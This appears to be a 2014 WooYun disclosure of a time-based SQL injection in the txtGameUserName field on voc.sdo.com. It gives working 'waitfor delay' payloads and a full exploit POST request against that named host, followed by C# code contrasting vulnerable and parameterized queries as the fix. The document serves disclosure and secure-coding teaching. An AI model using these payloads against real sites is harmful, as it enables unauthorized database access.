
SQL injection on another Shanda Online sub-site

2014-11-10 23:45

Dangerous characters in user input are not correctly sanitized before the input reaches the SQL query.

Proof of vulnerability:

Vulnerable parameter: txtGameUserName



Time-based payloads tested, with the observed HTTP response delay for each:

123'; waitfor delay '0:0:3'   -> response after 3 seconds

123'; waitfor delay '0:0:9'   -> response after 9 seconds

123'; waitfor delay '0:0:6'   -> response after 6 seconds



POST request (the txtGameUserName value carries the injected statement; here the delay is 0 seconds):



POST /VocGameUserBlockList.aspx HTTP/1.1

Content-Length: 5986

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://voc.sdo.com

Cookie: ASP.NET_SessionId=srabsmfpweyhdp55rz2g21vs; CheckCode=RLT0X

Host: voc.sdo.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



btnGo=%e6%9f%a5%e8%af%a2&ddlGameList=-1&ddlMonth=1&ddlYear=2013&txtGameUserName=n7shji8y';%20waitfor%20delay%20'0:0:0'%20--%20&__EVENTVALIDATION=...&__VIEWSTATE=...

(The __EVENTVALIDATION and __VIEWSTATE fields are the page's own multi-kilobyte base64 values and are omitted here; they play no part in the injection.)





sqlmap confirmation:

[screenshot: voc_sqli.jpg]



Fix:

Use parameterized SQL statements instead of concatenating the form value into the query text.
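The following C# is an added illustration, not the site's own code: it shows the kind of string-built T-SQL query that lets `123'; waitfor delay '0:0:3' --` become a stacked statement, beside the parameterized form the fix calls for. The table and column names (GameUserBlockList, GameUserName, GameId, BlockYear, BlockMonth) are assumptions chosen to match the form fields in the request above.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example; schema names are hypothetical.
public static class GameUserBlockListQuery
{
    // VULNERABLE: the form value is spliced into the statement text. A value such as
    //   123'; waitfor delay '0:0:3' --
    // closes the string literal, appends a second statement, and comments out the rest,
    // so SQL Server pauses for three seconds: the delay the report measured.
    public static DataTable QueryVulnerable(SqlConnection conn, string gameUserName,
                                            int gameId, int year, int month)
    {
        string sql = "SELECT * FROM GameUserBlockList WHERE GameUserName = '" + gameUserName + "'"
                   + " AND GameId = " + gameId + " AND BlockYear = " + year
                   + " AND BlockMonth = " + month;
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    // FIXED: the same query with SqlParameter placeholders. The user name travels to
    // SQL Server as a typed NVARCHAR value, not as statement text, so the quote and
    // the "waitfor delay" fragment are compared literally against the column and never run.
    public static DataTable QueryParameterized(SqlConnection conn, string gameUserName,
                                               int gameId, int year, int month)
    {
        const string sql = "SELECT * FROM GameUserBlockList WHERE GameUserName = @name"
                         + " AND GameId = @gameId AND BlockYear = @year AND BlockMonth = @month";
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@name", SqlDbType.NVarChar, 50).Value = gameUserName;
            cmd.Parameters.Add("@gameId", SqlDbType.Int).Value = gameId;
            cmd.Parameters.Add("@year", SqlDbType.Int).Value = year;
            cmd.Parameters.Add("@month", SqlDbType.Int).Value = month;
            // Bound execution time so a slow statement cannot tie up the request thread.
            cmd.CommandTimeout = 5;
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }
}
```

Length-limiting the parameter (NVarChar, 50) and typing the numeric form fields as Int also rejects the oversized or non-numeric values that scanners such as sqlmap send when probing a parameter.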

Source: www.wooyun.org/bugs/wooyun-2014-077459
